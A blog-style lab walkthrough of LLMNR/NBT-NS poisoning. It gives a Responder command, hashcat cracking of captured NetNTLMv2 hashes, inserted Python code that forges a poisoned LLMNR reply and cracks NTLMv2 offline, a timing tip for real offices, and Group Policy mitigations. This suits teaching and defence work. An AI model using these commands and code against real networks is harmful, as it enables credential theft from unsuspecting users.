The LLMNR Poisoning

Akshit Pal
3 min read · Jul 19, 2022


In summary: it's a man-in-the-middle, nothing else. Your old-school MITM, just aimed at local name resolution: you answer a name lookup that isn't yours, the victim connects to you instead of the real host, and you collect the NTLMv2 authentication it sends you.


Basically, Link-Local Multicast Name Resolution (LLMNR) and its older cousin NBT-NS (NetBIOS Name Service) are the fallbacks Windows uses to find a host when DNS can't. LLMNR multicasts to 224.0.0.252 on UDP 5355; NBT-NS broadcasts on UDP 137. How you end up there, in 4 simple steps:

STEP 1: Suppose you want to go to the fileshare for your salary slip, or maybe some 1337 docs that you need. When you try to open it, your local hosts file is checked for a matching record. Sadly, its IP is not there.

STEP 2: Your machine now looks in its DNS cache. Sadly, it's not there either.

STEP 3: At this point your machine is grilled AF and needs an answer ASAP, so it asks the DNS server. But DNS is like, who is this man, never seen him before (NXDOMAIN).

STEP 4: Last resort: the machine sends an LLMNR multicast query (and then an NBT-NS broadcast) asking every other machine on the local segment for fileshare's IP address.

But AD is supposed to be secure, right? They must have their ZERO TRUST stuff turned on, right? WRONG.

LLMNR multicasts the query to the whole local segment, and nothing verifies who answers: the reply carries no signature and no authentication, just the same 16-bit transaction ID and name that everyone on the wire has already seen. The first matching reply wins, and on a flat network that is whoever answers fastest. Here comes the good part.
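To make the "nothing verifies the answer" point concrete, here is an added example (not from the original post and not Responder's code) that builds the LLMNR query a Windows box multicasts, the reply a poisoner unicasts back, and the only two checks a resolver can apply to it. The name fileshare, the transaction ID 0x1337 and the attacker IP 10.0.0.66 are made up for the example; everything is built and parsed as bytes and nothing is sent on the network.

```python
import struct

# Where Windows sends LLMNR queries (RFC 4795); listed for reference, this example does not open a socket.
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: 'fileshare' -> b'\\x09fileshare\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        out += struct.pack("B", len(raw)) + raw
    return out + b"\x00"


def decode_name(pkt: bytes, off: int):
    """Read a label sequence at pkt[off:], following a compression pointer (0xC0xx) if one appears."""
    labels = []
    while True:
        ln = pkt[off]
        if ln & 0xC0 == 0xC0:
            ptr = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            rest, _ = decode_name(pkt, ptr)
            return ".".join(labels + [rest]), off + 2
        off += 1
        if ln == 0:
            return ".".join(labels), off
        labels.append(pkt[off:off + ln].decode("ascii"))
        off += ln


def build_query(txid: int, name: str) -> bytes:
    """What the victim multicasts once hosts file, cache and DNS have all failed: one A question, flags 0."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)     # QTYPE=A, QCLASS=IN


def build_poisoned_reply(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """What a poisoner unicasts back to the querier's source port: same ID, QR=1, one A record."""
    txid = struct.unpack("!H", query[:2])[0]
    _, end = decode_name(query, 12)
    question = query[12:end + 4]                                      # copy the question verbatim
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)          # QR set; there is no auth field to forge
    rdata = bytes(int(octet) for octet in attacker_ip.split("."))
    answer = b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata  # name = pointer to offset 12
    return header + question + answer


def parse_reply(reply: bytes) -> dict:
    """Pull out everything a resolver gets to look at."""
    txid, flags = struct.unpack("!HH", reply[:4])
    qname, off = decode_name(reply, 12)
    off += 4                                                          # skip QTYPE/QCLASS
    aname, off = decode_name(reply, off)
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", reply[off:off + 10])
    rdata = reply[off + 10:off + 10 + rdlen]
    return {"id": txid, "is_response": bool(flags & 0x8000), "name": qname,
            "answer_name": aname, "ip": ".".join(str(b) for b in rdata), "ttl": ttl}


def resolver_accepts(query: bytes, reply: bytes) -> bool:
    """The only checks available: QR bit, matching 16-bit ID, matching name. Both were already on the wire."""
    q_id = struct.unpack("!H", query[:2])[0]
    q_name, _ = decode_name(query, 12)
    r = parse_reply(reply)
    return r["is_response"] and r["id"] == q_id and r["answer_name"].lower() == q_name.lower()


if __name__ == "__main__":
    q = build_query(0x1337, "fileshare")                 # constructed: victim asks for 'fileshare'
    r = build_poisoned_reply(q, "10.0.0.66")             # constructed: attacker answers with its own IP
    print(parse_reply(r), resolver_accepts(q, r))
```

The takeaway is in resolver_accepts: the ID and the name are the whole "integrity check", and an attacker listening on the multicast group gets both for free before it answers.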

LLMNR Poisoning in 3 simple steps:

STEP 1: Turn on Responder. Run it as root (it binds privileged ports), for example:

python Responder.py -I eth0 -rdw

Responder is an LLMNR, NBT-NS and mDNS poisoner; you can get it from its GitHub repo (lgandx/Responder). In the command above I used eth0 as my interface because I'm running this in my home lab; the setup is from TCM's Practical Ethical Hacking (PEH) course. -I picks the interface; in the Responder version the course used, -r answers NetBIOS wredir suffix queries, -d answers NetBIOS domain suffix queries and -w starts the rogue WPAD proxy. Check python Responder.py --help on your version, because the flag meanings have changed (in current releases -d enables DHCP poisoning answers). After running the command, Responder prints the list of poisoners and servers it started and sits there waiting.

STEP 2: Now wait for a victim to send a request. He may need the fileshare we talked about, or just fat-finger a share name that doesn't exist, which is the usual trigger. On his side it looks like Explorer hanging for a moment on \\fileshare and then failing, because Responder's SMB server takes his authentication but never serves the share.

On your side, Responder prints the captured NTLMv2-SSP hash (USER::DOMAIN:serverchallenge:NTProofStr:blob) and also saves it under its logs/ directory. Note what you have: a Net-NTLMv2 challenge/response, not the NT hash, so you can't pass-the-hash with it; you take it offline and crack it.

STEP 3: Crack the hash with hashcat or the tool of your choice. For hashcat, -m 5600 is the NetNTLMv2 mode:

hashcat.exe -m 5600 hash1.txt rockyou.txt -O

(-O uses the optimized kernels, which cap the candidate password length; drop it if you expect long passwords.)

And it’s done, I got Password1
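What hashcat -m 5600 actually does with that capture line, as an added example (this is not the post's or Responder's or hashcat's code): it derives the NT hash (MD4 of the UTF-16LE password), keys HMAC-MD5 with it over the uppercased user plus the domain, HMACs the server challenge and the blob with that key, and compares the result with the NTProofStr field. The user akshit, domain LAB, server challenge, blob contents and the three-word wordlist are constructed for the example; a pure-Python MD4 is included because hashlib.new("md4") is missing on many OpenSSL 3 builds.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (pure Python: hashlib.new('md4') is absent on many OpenSSL 3 builds)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", 8 * len(data))           # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (function, additive constant, X[] index order, per-step shifts) per RFC 1320
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for fn, const, order, shifts in rounds:
            for i in range(16):
                t = (-i) % 4                               # register updated this step: a, d, c, b, ...
                a, b, c, d = s[t], s[(t + 1) % 4], s[(t + 2) % 4], s[(t + 3) % 4]
                s[t] = rotl((a + fn(b, c, d) + X[order[i]] + const) & 0xFFFFFFFF, shifts[i % 4])
        state = [(x + y) & 0xFFFFFFFF for x, y in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); the NTLMv2 key is derived from this, never sent on the wire."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NThash, upper(user) || domain), server_challenge || blob)."""
    v2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(v2_key, server_challenge + blob, hashlib.md5).digest()


def capture_line(user: str, domain: str, server_challenge: bytes, blob: bytes, password: str) -> str:
    """Build the hashcat -m 5600 line in the layout Responder prints: USER::DOMAIN:challenge:NTProofStr:blob (hex)."""
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guess-and-compare: the same work hashcat -m 5600 parallelises on the GPU."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.strip().split(":")
    challenge, target, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, challenge, blob), target):
            return candidate
    return None


# Constructed sample capture (not a real one): a lab user with the password the post cracked.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
# Simplified NTLMv2 blob: version header, zero timestamp, client challenge, reserved; AV pairs omitted.
BLOB = bytes.fromhex("0101000000000000") + bytes(8) + bytes.fromhex("aabbccddeeff0011") + bytes(8)
SAMPLE_LINE = capture_line("akshit", "LAB", SERVER_CHALLENGE, BLOB, "Password1")
SAMPLE_WORDLIST = ["letmein", "Summer2022", "Password1"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, SAMPLE_WORDLIST))
```

Two things fall out of this. The server challenge is chosen by the SMB server, i.e. by Responder, and the client challenge lives inside the blob, so every capture is salted and you crack each one separately. And because the NT hash only ever appears as an HMAC key, cracking is the only way back to a usable credential from a capture like this.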

TIP: The best time to run Responder is the beginning of the day or right after lunch, when people are logging in and reconnecting mapped drives, so name lookups (and typos) are flying around. And if you're on the defending side, the fix is the opposite of subtle: turn off multicast name resolution via Group Policy (Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution) and disable NetBIOS over TCP/IP on the adapters, so there is no fallback for Responder to answer.
